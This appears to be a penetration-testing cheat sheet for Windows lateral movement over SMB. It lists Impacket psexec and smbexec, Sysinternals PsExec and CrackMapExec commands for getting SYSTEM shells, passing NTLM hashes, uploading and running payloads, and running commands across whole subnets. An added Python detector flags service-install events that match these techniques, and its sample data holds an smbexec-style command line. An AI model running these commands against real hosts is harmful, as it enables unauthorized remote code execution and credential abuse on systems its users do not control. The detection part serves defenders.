Impacket — psexec
```bash
impacket-psexec DOMAIN/user:password@TARGET
impacket-psexec DOMAIN/user@TARGET -hashes :NTLM_HASH
impacket-psexec DOMAIN/user:password@TARGET -codec 437 # Fix encoding
```
Returns SYSTEM shell.
Impacket — smbexec
```bash
impacket-smbexec DOMAIN/user:password@TARGET
impacket-smbexec DOMAIN/user@TARGET -hashes :NTLM_HASH
```
No binary upload — uses service creation.
Sysinternals PsExec
```powershell
PsExec.exe \\TARGET -u DOMAIN\user -p password cmd.exe
PsExec.exe \\TARGET -u DOMAIN\user -p password -s cmd.exe # SYSTEM
PsExec.exe \\TARGET -u DOMAIN\user -p password -c payload.exe # Upload & exec
```
Accept EULA
```powershell
PsExec.exe -accepteula \\TARGET cmd.exe
```
CrackMapExec
```bash
crackmapexec smb TARGET -u user -p password -x "whoami" # CMD
crackmapexec smb TARGET -u user -p password -X "Get-Process" # PowerShell
crackmapexec smb TARGET -u user -H NTLM_HASH -x "whoami"
```
Multiple Targets
```bash
crackmapexec smb 10.10.10.0/24 -u admin -p password -x "whoami"
crackmapexec smb targets.txt -u admin -H HASH -x "whoami"
```
Requirements
- Admin rights on target
- SMB (445) accessible
- ADMIN$ or C$ share writable (psexec)
- File and Printer Sharing enabled
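
A detection-side view of the two behaviours noted above (a binary written to ADMIN$ for psexec, service creation with no upload for smbexec), as an added example that is not from the original page: it triages service-install records shaped like Windows Event ID 7045. The record fields, sample events, service names and the three heuristics are assumptions constructed for illustration.

```python
import re

# Constructed sample records shaped like System-log Event ID 7045
# ("A service was installed in the system"); not taken from a real host.
SAMPLE_EVENTS = [
    {"EventID": 7045, "Computer": "WS01", "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"EventID": 7045, "Computer": "WS02", "ServiceName": "kXqZ",
     "ImagePath": r"%SystemRoot%\aBcDeFgH.exe"},
    {"EventID": 7045, "Computer": "WS03", "ServiceName": "BTOBTO",
     "ImagePath": r"%COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\__output 2^>^&1 > "
                  r"%TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat"},
    {"EventID": 7045, "Computer": "WS04", "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
    {"EventID": 7036, "Computer": "WS04", "ServiceName": "PSEXESVC", "ImagePath": ""},
]

# Heuristics (assumptions; tune against your own baseline of legitimate services).
RULES = [
    # Service name or binary used by Sysinternals PsExec.
    ("psexesvc-service", lambda e: e["ServiceName"].upper() == "PSEXESVC"
        or e["ImagePath"].upper().endswith(r"\PSEXESVC.EXE")),
    # A command interpreter one-liner registered as a service (no binary upload).
    ("shell-as-service", lambda e: re.search(
        r"(%comspec%|\bcmd(\.exe)?)\s+/q\s+/c\b", e["ImagePath"], re.I) is not None),
    # An executable sitting directly in the Windows directory, which is what ADMIN$ exposes.
    ("exe-in-admin-share-root", lambda e: re.fullmatch(
        r"(%systemroot%|[a-z]:\\windows)\\[^\\]+\.exe",
        e["ImagePath"].strip('"'), re.I) is not None),
]

def triage(events):
    """Return (computer, service, [rule names]) for each suspicious 7045 record."""
    hits = []
    for e in events:
        if e.get("EventID") != 7045:  # only service-install events are in scope
            continue
        matched = [name for name, test in RULES if test(e)]
        if matched:
            hits.append((e["Computer"], e["ServiceName"], matched))
    return hits

if __name__ == "__main__":
    for computer, service, rules in triage(SAMPLE_EVENTS):
        print(f"{computer}: service {service!r} matched {', '.join(rules)}")
```
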
Quick Reference
| Tool | Command |
|---|---|
| Impacket psexec | impacket-psexec DOMAIN/user:pass@TARGET |
| Impacket smbexec | impacket-smbexec DOMAIN/user:pass@TARGET |
| Sysinternals | PsExec.exe \\TARGET -u user -p pass cmd |
| CME | crackmapexec smb TARGET -u user -p pass -x "cmd" |